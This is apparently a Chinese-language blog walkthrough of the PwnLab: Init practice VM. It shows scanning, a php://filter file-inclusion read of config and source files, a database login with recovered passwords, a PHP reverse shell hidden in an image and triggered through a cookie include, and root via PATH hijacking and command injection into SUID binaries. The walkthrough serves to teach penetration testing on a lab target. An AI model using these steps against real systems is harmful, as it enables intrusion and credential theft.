真的学不了一点。。。
真的学不了一点。。。

红队打靶练习:PWNLAB: INIT

信息探测

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.131  00:0c:29:e4:db:ad       VMware, Inc.
192.168.12.254  00:50:56:fb:5b:5a       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.339 seconds (109.45 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 600
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      7     420  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.131  00:0c:29:e4:db:ad      1      60  VMware, Inc.
 192.168.12.254  00:50:56:fb:5b:5a      1      60  VMware, Inc.
3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 15:55 CST
Nmap scan report for 192.168.12.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000056s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.131
Host is up (0.00014s latency).
MAC Address: 00:0C:29:E4:DB:AD (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.0013s latency).
MAC Address: 00:50:56:FB:5B:5A (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.33 seconds


端口扫描

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 15:55 CST
Nmap scan report for 192.168.12.131
Host is up (0.0044s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
3306/tcp  open  mysql
52998/tcp open  unknown
MAC Address: 00:0C:29:E4:DB:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds

快速提取端口信息

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | awk -F "/" '{print $1}' | head -n 9 | tail -n 4 | xargs -n 4 | sed 's/ /,/g'
80,111,3306,52998

里面包含了 cat、awk、head、tail、xargs、sed等linux命令,不会的可以去学习一下!


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -A -p 80,111,3306,52998 192.168.12.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 16:47 CST
Nmap scan report for 192.168.12.131
Host is up (0.00036s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          46058/udp6  status
|   100024  1          51412/udp   status
|   100024  1          52998/tcp   status
|_  100024  1          57087/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 41
|   Capabilities flags: 63487
|   Some Capabilities: SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsTransactions, Speaks41ProtocolNew, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, LongPassword, SupportsCompression, FoundRows, InteractiveClient, IgnoreSigpipes, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: nU>w\G0VA$-VKTC2qd"u
|_  Auth Plugin Name: mysql_native_password
52998/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:E4:DB:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.12.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.91 seconds


漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 80,111,3306,52998 192.168.12.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 16:49 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.131
Host is up (0.00034s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.0.1
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.12.131
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.12.131:80/?page=login
|     Form id: user
|_    Form action:
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum:
|   /login.php: Possible admin folder
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
111/tcp   open  rpcbind
3306/tcp  open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
52998/tcp open  unknown
MAC Address: 00:0C:29:E4:DB:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 344.93 seconds
4、nikto
┌──(root㉿ru)-[~]
└─# nikto -h 192.168.12.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.131
+ Target Hostname:    192.168.12.131
+ Target Port:        80
+ Start Time:         2023-12-12 16:50:31 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /login.php: Admin login page/section found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-12-12 16:50:48 (GMT8) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

目录探测

1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.12.131 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.131
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.12.131/images/]
/upload               (Status: 301) [Size: 317] [--> http://192.168.12.131/upload/]
/server-status        (Status: 403) [Size: 302]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================


难道目录就这点东西吗?
2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.131 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.131/_23-12-12_17-02-32.txt

Target: http://192.168.12.131/

[17:02:32] Starting:
[17:02:33] 403 -  300B  - /.ht_wsr.txt
[17:02:33] 403 -  303B  - /.htaccess.bak1
[17:02:33] 403 -  303B  - /.htaccess.orig
[17:02:33] 403 -  305B  - /.htaccess.sample
[17:02:33] 403 -  304B  - /.htaccess_extra
[17:02:33] 403 -  303B  - /.htaccess_orig
[17:02:33] 403 -  303B  - /.htaccess.save
[17:02:33] 403 -  301B  - /.htaccessOLD
[17:02:33] 403 -  293B  - /.htm
[17:02:33] 403 -  301B  - /.htaccess_sc
[17:02:33] 403 -  301B  - /.htaccessBAK
[17:02:33] 403 -  294B  - /.html
[17:02:33] 403 -  302B  - /.htaccessOLD2
[17:02:33] 403 -  303B  - /.htpasswd_test
[17:02:33] 403 -  300B  - /.httr-oauth
[17:02:33] 403 -  299B  - /.htpasswds
[17:02:34] 403 -  294B  - /.php3
[17:02:34] 403 -  293B  - /.php
[17:02:47] 200 -    0B  - /config.php
[17:02:53] 200 -  455B  - /images/
[17:02:53] 301 -  317B  - /images  ->  http://192.168.12.131/images/
[17:02:55] 200 -  164B  - /login.php
[17:03:04] 403 -  302B  - /server-status
[17:03:04] 403 -  303B  - /server-status/
[17:03:09] 301 -  317B  - /upload  ->  http://192.168.12.131/upload/
[17:03:09] 200 -   19B  - /upload.php
[17:03:09] 200 -  405B  - /upload/

Task Completed


gobuster加载的字典可以换了!
3、feroxbuster
feroxbuster -u ip -x 类型 -w 字典
4、dirb
dirb http://192.168.12.131

这些扫描器的效果都差不多,就不一一演示了!

WEB

80端口

红队打靶练习:PWNLAB: INIT_第1张图片

需要登录,可以上传东西,似乎可以利用上传木马来反弹shell。不过先找到密码再说!
config文件

红队打靶练习:PWNLAB: INIT_第2张图片

不应该啊,按理说,开了3306端口,那么config.php文件中应该会有关键信息啥的啊!可能有某种过滤机制,我们尝试使用php伪协议进行绕过!

https://www.cnblogs.com/cainiao-chuanqi/p/15818547.htmlicon-default.png?t=N7T8https://www.cnblogs.com/cainiao-chuanqi/p/15818547.html

红队打靶练习:PWNLAB: INIT_第3张图片

http://192.168.12.131/?page=php://filter/convert.base64-encode/resource=config

红队打靶练习:PWNLAB: INIT_第4张图片

成功!

┌──(root㉿ru)-[~/kali]
└─# echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" | base64 -d
  


得到数据库账号密码

root:H4u%QJ_H99


┌──(root㉿ru)-[~/kali]
└─# mysql -h 192.168.12.131  -u root -p
Enter password:
ERROR 1129 (HY000): Host '192.168.12.128' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'

如果兄弟们出现这种情况,不要慌,只要重启靶机就行了。
原因: 同一个 IP 短时间内产生太多(超过mysql数据库设置的最大报错值),中断的数据库连接会导致数据库连接阻塞


┌──(root㉿ru)-[~/kali]
└─# mysql -h 192.168.12.131  -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)

MySQL [Users]>


得到几个base64编码的密码。
解码

+------+------------------+
| user | pass             |
+------+------------------+
| kent | JWzXuBJJNy       |
| mike | SIfdsTEn6I       |
| kane | iSv5Ym2GRo       |
+------+------------------+
成功登录

红队打靶练习:PWNLAB: INIT_第5张图片

登录成功了!我们先不要急着上传木马!对于上传点,我们尽量选择上传图片马,因为很多上传点都会做一些防护,我们用图片马更加保险!不过我们先尝试使用php木马。
upload file

红队打靶练习:PWNLAB: INIT_第6张图片

我尝试上传php木马,但是很明显,有过滤机制。那么我们就去利用文件包含漏洞读文件上传源码。在前面我们收集到了upload目录但是啥也没有,我们尝试读取upload文件。

红队打靶练习:PWNLAB: INIT_第7张图片

PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==

base64解码后



        
                

                        
                        
                

        

1){
                        die('Error 003');
                }

                $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

                if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
                        echo "
";
                } else {
                        die('Error 4');
                }
        }
}

?> 


解读源码后,发现,果真是只能上传图片啥的!

红队打靶练习:PWNLAB: INIT_第8张图片

找一个正常的图片,然后用vim打开,在最后面加上php反弹shell木马!

但是问题又又又来了,访问图片马没有反弹shell,寄!可能是某种规则!我们去把主页源码扒下来。
index.php
PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=

base64解码





PwnLab Intranet Image Hosting






[ Home ] [ Login ] [ Upload ]







  


在这段代码中, 浏览器会检查Cookie 中是否设置了 ‘lang’,如果设置了,则尝试包含对应语言的 PHP 文件。那么我们只需要在cookie中加入图片马上传的路径即可。

lang=../upload/b2f268d362a679d4738d49c492671e53.png
反弹shell

红队打靶练习:PWNLAB: INIT_第9张图片

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.12.131: inverse host lookup failed: Unknown host
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.131] 50149
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
 05:30:44 up 48 min,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/$ ls
ls
bin   dev  home        lib         media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lost+found  mnt    proc  run   srv   tmp  var
www-data@pwnlab:/$

python -c 'import pty;pty.spawn("/bin/bash")' 提高交互性

提权

系统信息收集
www-data@pwnlab:/$ uname -a
uname -a
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux

www-data@pwnlab:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 8.3 (jessie)
Release:        8.3
Codename:       jessie

www-data@pwnlab:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4

www-data@pwnlab:/$ sudo -l
sudo -l
bash: sudo: command not found

www-data@pwnlab:/$
横向提权
kent@pwnlab:/home$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:~$ ls -al
ls -al
total 28
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

kane@pwnlab:~$ cd /tmp
cd /tmp
kane@pwnlab:/tmp$ ls
ls
b2f268d362a679d4738d49c492671e53.png
kane@pwnlab:/tmp$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:/tmp$ chmod 777 cat
chmod 777 cat
kane@pwnlab:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
kane@pwnlab:/tmp$ cd && ./msgmike
cd && ./msgmike
mike@pwnlab:~$ cd /home
cd /home
mike@pwnlab:/home$ ls
ls
john  kane  kent  mike
mike@pwnlab:/home$ cd mike
cd mike
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: hello && /bin/sh
hello && /bin/sh
hello
# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# cd /root
cd /root
# ls
ls
flag.txt  messages.txt
#/bin/cat flag.txt
/bin/cat flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                [email protected] - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'

你可能感兴趣的:(红队渗透靶机,网络安全)

  • 山东大学小树林支教调研团青青仓木队——翟晓楠 山东大学青青仓木队
    过了半年,又一次启程,又一次回到支教的初心之地。比起上一次的试探与不安,我更多了一丝稳重与熟练。心境、处境也都随着半个学期的过去而变得不同,半个学期中,身体上的,心理上的,太多的逆境让我变得步履维艰,曲曲折折,弯弯绕绕,我仿佛打不起精神,没有胃口,没有动力。感觉走的不顺畅的时候,支教这个旅程,给了我力量。自告奋勇承担起队长这一职务的我,从组织时的复杂和困难的经历,协调各种问题,从无到有,和校长和队
  • 2019-05-13 王健_100a
    【撒下18:2】大卫打发军兵出战,分为三队:一队在约押手下,一队在洗鲁雅的儿子约押兄弟亚比筛手下,一队在迦特人以太手下。大卫对军兵说:“我必与你们一同出战。”解释:大卫检阅部队,将它分成三队,每队由一位元帅统领;约押与兄弟亚比筛,并迦特人以太共同指挥。大卫想与他们一同出战!应用:作为领袖与军兵一起出战是很重要。领袖在事奉中与信徒一起,领袖在任何的环境里与信徒一起走过。我们要同心协力为主而战。祷告:
  • 《大兴安岭猎人传说》今年最好看的东北鬼怪故事,很优秀 一部电影
    《大兴安岭猎人传说》是最新上映于愚人节的网剧,别看是网剧却远超出我的个人预料。该片由民俗故事改编,这点就很吸引人,因为民俗故事口口相传,比那些编造而成的鬼故事更具有了真实性,网大做的电影还不错哦,如果可以我打四星好评。大兴安岭的故事我们经常听老人提起,那里有原始大森林,物产丰富,更流传着精灵怪物的传说。什么红黄白柳灰,出马仙、人参娃娃的故事层出不穷,以大兴安岭为背景的故事真不少。可很多鬼片看到最后
  • 2018-12-07 旅一06丁琪琪
    旅管一班6组学号链接06丁琪琪16家国鑫26孟令慧30王思宁36温红丽46朱赵筱楠
  • 红手套节 马小媛为中国城市环卫者公益发声:今天我手红 疏狂君
    #红手套节#公益活动,线头公益以及同多方资源的共同努力我们邀请到了线头公益大使马小媛马小媛,1993年5月3日出生于江苏省南京市,中国内地新生代女演员。2015年马小媛参演网剧《余罪》,饰演警校校花安嘉璐的闺蜜。2016年马小媛主演系列电影《丽人保镖》中女一号林欢馨,正式出道。此后,马小媛陆续接演了电视剧《警花与警犬2》,在网剧《你美丽李美丽》中担任女主角李美丽。拂晓,当你还在睡梦中时,这座城跟你
  • 4.C_数据结构_队列 荣世蓥 数据结构数据结构
    概述什么是队列:队列是限定在两端进行插入操作和删除操作的线性表。具有先入先出(FIFO)的特点相关名词:队尾:写入数据的一段队头:读取数据的一段空队:队列中没有数据,队头指针=队尾指针满队:队列中存满了数据,队尾指针+1=队头指针循环队列1、基本内容循环队列是以数组形式构成的队列数据结构。循环队列的结构体如下:typedefintdata_t;//队列数据类型#defineN64//队列容量typ
  • 离奇的投毒案(七) 蜗居山人
    (接上文)庭审很快开始了,李妹坐在旁听席的第一排,她想看看丈夫到底是不是害死儿女的凶手。公诉人宣读起诉书后,审判长询问张春对起诉书指控的犯罪事实是否承认,张春矢口否认,当庭翻供。李妹心中一阵得意:“我早就判断丈夫不是凶手!刑警队弄错了,这下看武队长如何收场!这可是公开审理。”审判长问:“你怎么在公安机关承认犯罪事实呢?”“他们刑讯逼供,没有办法我只能承认。”李妹心里嘟囔:“俺丈夫爱我和孩子胜过爱他
  • 计算机木马详细编写思路 小熊同学哦 php开发语言木马木马思路
